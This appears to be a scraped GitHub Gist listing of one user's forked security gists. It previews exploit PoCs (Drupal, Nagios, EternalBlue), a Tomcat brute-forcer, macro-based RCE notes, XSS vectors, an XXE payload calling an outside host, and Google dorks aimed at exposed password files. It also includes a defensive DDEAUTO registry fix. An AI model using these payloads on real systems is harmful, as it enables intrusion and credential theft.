Yunus YILDIRIM th3gundy

View cve-2019-6340.py
#!/usr/bin/env python3
# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC
# 2019 @leonjza
# Technical details for this exploit are available at:
# https://www.drupal.org/sa-core-2019-003
# https://www.ambionics.io/blog/drupal8-rce
# https://twitter.com/jcran/status/1099206271901798400
@th3gundy
th3gundy / spectre.c
Created Jan 5, 2018 — forked from ErikAugust/spectre.c
Spectre example code
View spectre.c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
@th3gundy
th3gundy / 666_lines_of_XSS_vectors.html
Created Nov 27, 2017 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
View 666_lines_of_XSS_vectors.html
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@th3gundy
th3gundy / tomcat_bruteforce.py
Created Nov 2, 2017 — forked from itsecurityco/tomcat_bruteforce.py
Tomcat manager console bruteforce
View tomcat_bruteforce.py
"""
Tomcat bruteforce
Author: @itsecurityco
"""
import os
import sys
import getopt
import base64
import requests
@th3gundy
th3gundy / disable_ddeauto.reg
Created Oct 23, 2017 — forked from wdormann/disable_ddeauto.reg
Disable DDEAUTO for Outlook, Word, OneNote, and Excel versions 2010, 2013, 2016
View disable_ddeauto.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
"DontUpdateLinks"=dword:00000001
@th3gundy
th3gundy / Various-Macro-Based-RCEs.md
Created Aug 24, 2017 — forked from mgeeky/Various-Macro-Based-RCEs.md
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.
View Various-Macro-Based-RCEs.md

This is a note for myself describing various Visual Basic macros construction techniques that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

  1. Page substitution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload
@th3gundy
th3gundy / nagios_cmd_injection.py
Created Aug 7, 2017 — forked from xl7dev/nagios_cmd_injection.py
Nagios Exploit Command Injection CVE-2016-9565
View nagios_cmd_injection.py
#!/usr/bin/env python
intro = """\033[94m
Nagios Core < 4.2.0 Curl Command Injection PoC Exploit (CVE-2016-9565)
nagios_cmd_injection.py ver. 1.0
Discovered & Coded by:
Dawid Golunski
https://legalhackers.com
\033[0m
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@th3gundy
th3gundy / GoogleHackMasterList.txt
Created May 28, 2017 — forked from cmartinbaughman/GoogleHackMasterList.txt
The definitive super list for "Google Hacking".
View GoogleHackMasterList.txt
admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd
Duclassified" -site:duware.com "DUware All Rights reserved"
duclassmate" -site:duware.com
@th3gundy
th3gundy / eternalblue8_exploit.py
Created May 18, 2017 — forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
View eternalblue8_exploit.py
#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)